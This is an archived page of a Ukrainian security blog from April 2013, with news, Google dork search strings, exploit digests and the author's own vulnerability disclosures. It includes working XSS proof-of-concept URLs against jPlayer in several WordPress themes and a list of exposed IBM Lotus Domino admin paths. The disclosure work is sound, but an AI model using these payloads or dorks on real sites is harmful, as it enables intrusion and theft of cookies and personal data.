Архів за Квітень, 2013

Новини: однакові паролі, бекдор в Apache та вплив на фондову біржу

22:48 27.04.2013

За повідомленням www.xakep.ru, 55% користувачів використовують однаковий пароль на більшості веб сайтів.

Міністерство комунікацій Великобританії оголосило тривожні дані відносно занадто безтурботного відношення користувачів до власної безпеки. Проведене опитування показало, що більше половини британських користувачів (55%) використовують один і той самий пароль для більшості, якщо не для всіх, веб сайтів.

Це поширена і давно відома практика серед Інтернет-користувачів. На яку вже багато років звертають увагу фахівці з безпеки. І вона є небезпечною для користувачів у зв’язку з поширеними випадками витоків паролів на різних сайтах, кількість яких постійно зростає.

За повідомленням www.opennet.ru, на серверах з Cpanel виявлений бекдор, інтегрований у виконавчий файл Apache httpd.

На Linux-серверах, що використовують панель керування хостингом Cpanel, виявлений новий бекдор, що вражає компоненти http-сервера Apache. На відміну від попередніх способів впровадження в Apache, заснованих на завантаженні окремого троянського модуля, нове шкідливе ПЗ відрізняється прямою інтеграцією у виконавчий файл httpd. Шкідлива вставка додається безпосередньо у виконавчий файл і перенаправляє на свій код кілька обробників, що викликаються у процесі обслуговування зовнішніх запитів до веб сервера.

Уся пов’язана з бекдором інформація зберігається у розділюваній пам’яті. Команди керування бекдором передаються через спеціальні HTTP GET-запити, що обробляються шкідливою вставкою мовчки, без відображення будь-яких даних у лозі.

Стосовно бекдорів для веб серверів раніше я писав про руткіт для Nginx та шкідливі модулі для Apache. Даний метод розповсюдження інфекції стає все більш поширеним.

За повідомленням www.xakep.ru, фальшивий твіт понизив котирування на фондовій біржі.

У вівторок 23 квітня ми одержали рідку можливість оцінити, який конкретний вплив на фондовий ринок мають твіттер та інформаційні агентства. Як з’ясувалось, ринок уважно стежить за інформаційними потоками і жваво реагує на них. Реакція настільки швидка, що вона по визначенню не може бути обміркованою. У даному випадку ринок відреагував на абсолютно вигадану інформацію зі взломаного твіттера новинного агентства.

Цей випадок зі взломом твіттер акаунта AP наочно показує, як взлом сайта й розміщення на ньому дезінформації може призводити до фінансових втрат. Зокрема, до зниження котирувань на фондовій біржі. Після цього інциденту, вслід за багатьма іншими компаніями, Twitter оголосила про впровадження двохфакторної аутентифікації.

“Warning” Google хакінг №11

20:09 27.04.2013

Продовжу тему “Warning” Гугл хакінга (”Warning” Google hacking). Котрий є різновидом Гугл хакінга - використання пошукових систем (зокрема Гугла) для пошуку уразливостей на сайтах.

Дана методика передбачає використання Гугла (чи інших пошукових систем) з метою пошуку повідомлень на сайтах про помилки, і дозволяє знайти важливу інформацію стосовно даних сайтів. За допомогою спеціальних пошукових запитів (дорків) можна знайти Full path disclosure та Information leakage уразливості на різноманітних сайтах в Інтернеті.

Новий перелік “варнінг” пошукових запитів:

Warning: Unable to load dynamic library

Warning: dbmreplace

Warning: dbx_close

Warning: dbx_connect

Warning: dbx_query

“Warning: end has”

Warning: ereg

Warning: ereg_replace

Добірка експлоітів

17:26 27.04.2013

В даній добірці експлоіти в веб додатках:

  • Verizon Fios Router MI424WR-GEN3I - CSRF Vulnerability (деталі)
  • GroundWork monarch_scan.cgi OS Command Injection Vulnerability (деталі)
  • D-Link DIR-615 / DIR-300 XSS / CSRF / Command Injection Vulnerabilities (деталі)
  • Windows Light HTTPD 0.1 - Buffer Overflow Vulnerability (деталі)
  • TP-LINK TL-WR741N / TL-WR741ND Denial Of Service (деталі)

BF та IA уразливості в IBM Lotus Domino

23:55 26.04.2013

16.05.2012

У травні, 03.05.2012, під час пентесту, я виявив багато уразливостей в IBM Lotus Domino, зокрема Brute Force та Insufficient Authentication. Це друга порція уразливостей в Lotus Domino. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в IBM Lotus Domino.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

26.04.2013

Brute Force (WASC-11):

Дані сторінки, що вимагають аутентифікацію, не мають захисту від BF атак.

http://site/names.nsf
http://site/admin4.nsf
http://site/busytime.nsf
http://site/catalog.nsf
http://site/certsrv.nsf
http://site/domlog.nsf
http://site/events4.nsf
http://site/log.nsf
http://site/statrep.nsf
http://site/webadmin.nsf
http://site/web/war.nsf

Існує два варіанти форми логіна: Basic Authentication та html-форма. І в обох випадках має місце BF уразливість. Перший варіант я виявив під час пентесту ще в 2008, а під час пентесту в 2012 я виявив сайти, що використовували обидва варіанти.

Insufficient Authentication (WASC-01):

Непривілейований користувач (з будь-яким акаунтом на сайті, доступ до якого може бути отриманий через Brute Force уразливість) має доступ до наступних сторінок:

https://site/names.nsf - витік інформації про всіх користувачів (імена, прізвища, логіни, емайли та інша персональна інформація і налаштування)

https://site/admin4.nsf - витік інформації про дії адміністратора (Administration Requests), включаючи персональну інформацію (імена, прізвища, логіни та інше)

https://site/catalog.nsf - витік інформації про файли на сервері, про встановлені програми і про їх налаштування (Application Catalog), включаючи персональну інформацію (імена, прізвища, логіни та інше)

https://site/events4.nsf - витік інформації про події (Monitoring Configuration)

Після отримання доступу до names.nsf, можна використати Information Leakage уразливість, що знайдена Leandro Meiners в 2005 (для отримання хешів паролів) і яка досі не виправлена. IBM не виправила її в дефолтній конфігурації, а лише порадила прибрати поле хеша з профайлів, або використати солені хеші. Мій клієнт використав саме солені хеші й це не допомогло (99% хешів були підібрані, включаючи адмінський).

Уразливі IBM Lotus Domino 8.5.3, 8.5.4, 9.0 та попередні версії. В версії Domino 9.0, що вийшла у березні, IBM так і не виправила дані уразливості. Як нещодавно мені повідомили з IBM, майже через рік після мого інформування про ці уразливості, вони не виправили їх, бо не бачать в цьому потреби. Бо за їх словами в Domino існують вбудовані механізми для захисту від BF та IA, тому ці дірки не є проблемою додатку (а проблемою конкретних сайтів).

Тобто власники сайтів Lotus Domino повинні краще його налаштовувати для захисту від даних атак. З чим я не згоден, так як на всіх сайтах на Domino, що я перевіряв під час пентестів, були саме такі налаштування (схоже, що це налаштування по замовчуванню) і мали місце дані уразливості. Тобто це проблема саме Domino.

Квітневий вівторок патчів від Microsoft

22:34 26.04.2013

У квітні місяці Microsoft випустила 9 патчів. Що більше ніж у березні.

У квітневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 9 бюлетенів по безпеці. Що закривають численні уразливості в програмних продуктах компанії. Два патчі закривають критичні уразливості та сім патчів закривають важливі уразливості.

Дані патчі стосуються всіх поточних операційних систем компанії Microsoft - Windows XP, 2003, Vista, 2008, 7, 2008 R2, 8, 2012, RT. А також Microsoft Office, Internet Explorer, SharePoint та серверних продуктів Microsoft.

Уразливості в плагінах для WordPress №104

20:03 26.04.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Traffic Analyzer, Spiffy XSPF Player та Spider Video Player. Для котрих з’явилися експлоіти. Traffic Analyzer - це плагін для аналіза трафіка, Spiffy XSPF Player - це медіа плеєр, Spider Video Player - це відео плеєр.

  • WordPress Traffic Analyzer Cross Site Scripting (деталі)
  • WordPress Spiffy XSPF Player 0.1 SQL Injection (деталі)
  • WordPress Spider Video Player 2.1 SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливості в Adobe ColdFusion

17:22 26.04.2013

Виявлені уразливості безпеки в Adobe ColdFusion.

Уразливі версії: Adobe ColdFusion 9.0, ColdFusion 10.

Витік інформації, несанкціонований доступ.

  • Уязвимости безопасности в Adobe ColdFusion (деталі)

Численні уразливості в численних темах для WordPress з jPlayer

23:59 25.04.2013

У січні, 31.01.2013, я виявив Cross-Site Scripting, Content Spoofing та Full path disclosure уразливості в темах для WordPress, що містять jPlayer.

Раніше я писав про XSS та Content Spoofing уразливості в jPlayer. Це дуже поширена флешка, що знаходиться на десятках тисяч веб сайтів і яка використовується в сотнях веб додатків. Зокрема в багатьох плагінах і темах для WordPress. Плюс є багато сайтів, на яких Jplayer.swf розміщена в інших папках окрім плагінів і тем. При стандартному пошуку через Гугл дорки виводиться 32000 сайтів з Jplayer.swf, а при пошуку по темам для WordPress можна знайти 313000 сайтів з цією флешкою.

Цей плеєр міститься в багатьох темах (шаблонах) для WordPress. Серед них Studiozen, Photocrati, Music, Imperial Fairytale та Feather12. Та тисячі інших уразливих тем для WordPress (судячи з гугл дорка). Розробники jPlayer випустили оновлення свого плеєра і всім розробникам веб додатків з jPlayer потрібно його оновити в своїх додатках.

Cross-Site Scripting (WASC-08):

В різних версіях jPlayer різні XSS уразливості.

Studiozen:

http://site/wp-content/themes/studiozen/js/html5player/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Photocrati:

http://site/wp-content/themes/photocrati-theme/scripts/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Music:

http://site/wp-content/themes/music/js/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Imperial Fairytale:

http://site/wp-content/themes/imperial-fairytale/assets/swf/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alertu0028document.cookieu0029%3E

Feather12:

http://site/wp-content/themes/feather12/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/feather12/js/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Content Spoofing (WASC-12):

Можна проводити CS (включення аудіо/відео файлів з зовнішніх ресурсів) через JS і XSS через JS калбеки. Для цього необхідна HTML Injection уразливість на цільовому сайті. Атака аналогічна XSS через калбеки в JW Player.

Full path disclosure (WASC-13):

Всі зазначені теми мають FPD уразливості в php-файлах (в index.php та інших), що типово для WP тем.

http://site/wp-content/themes/studiozen/

http://site/wp-content/themes/photocrati-theme/

http://site/wp-content/themes/music/

http://site/wp-content/themes/imperial-fairytale/

http://site/wp-content/themes/feather12/

Вразливі наступні веб додатки: всі версії тем Studiozen, Photocrati, Music, Imperial Fairytale та Feather12.

Дані XSS уразливості виправлені в версії jPlayer 2.2.23 (але не виправлені CS через JS і XSS атаки через JS калбеки, а також в версії 2.3.0 працюють інші обхідні методи атаки, про що я вже писав розробникам jPlayer у березні та нагадав ще раз). Тому розробникам даних та інших плагінів для WP з jPlayer потрібно оновити його до останньої версії.

Шостий масовий взлом сайтів на сервері Delta-X

22:40 25.04.2013

З 06.04.2012 по 04.02.2013 відбувся шостий масовий взлом сайтів на сервері Delta-X, після п’ятого взлому сайтів на сервері Delta-X. Нещодавно я вже розповідав про інші масові взломи.

Був взломаний шостий сервер компанії Delta-X. Взлом складався з багатьох окремих дефейсів. Попередні п’ять масових дефейсів на серверах даної компанії відбувалися в 2010 році.

Всього було взломано 19 сайтів на сервері української компанії Delta-X (IP 91.206.201.15). Це наступні сайти: kroshkadekor.com, www.drivers-nout.com, promland.biz, www.clothescloser.com.ua, obuhivzem.gov.ua, 700-800.com, www.komfort.zt.ua, dom2007.com.ua, vadmart.net, viver.net.ua, www.kotovsk-teplokomunenergo.com.ua, www.sitlie.com, pulsarmodel.net, www.uslugikiev.com, ustars.org.ua, artcollege.dn.ua, auto-forum.ikoleso.com.ua, test.music4us.com.ua, divar.com.ua. Серед них український державний сайт obuhivzem.gov.ua.

Дефейси по одному сайту булу проведені хакерами ZoRRoKiN, Newbie3viLc063s, ArTiN, AkSuVaRi, ha4k3r, Aerul Da White-Hkc, Hmei7, david becker, Momik, DaiLexX і netcat та по два сайти хакерами Sejeal, misafir, 1923Turk і TURK KURSUNU.

Враховуючи велику кількість окремих дефейсів по одному або два сайти, всі вони явно були зроблені при взломах окремих сайтів.

Численні уразливості в Adobe Shockwave Player

20:08 25.04.2013

Виявлені численні уразливості безпеки в Adobe Shockwave Player.

Уразливі версії: Adobe Shockwave Player 12.0.

Переповнення буфера, пошкодження пам’яті, витік інформації.

  • Security update available for Adobe Shockwave Player (деталі)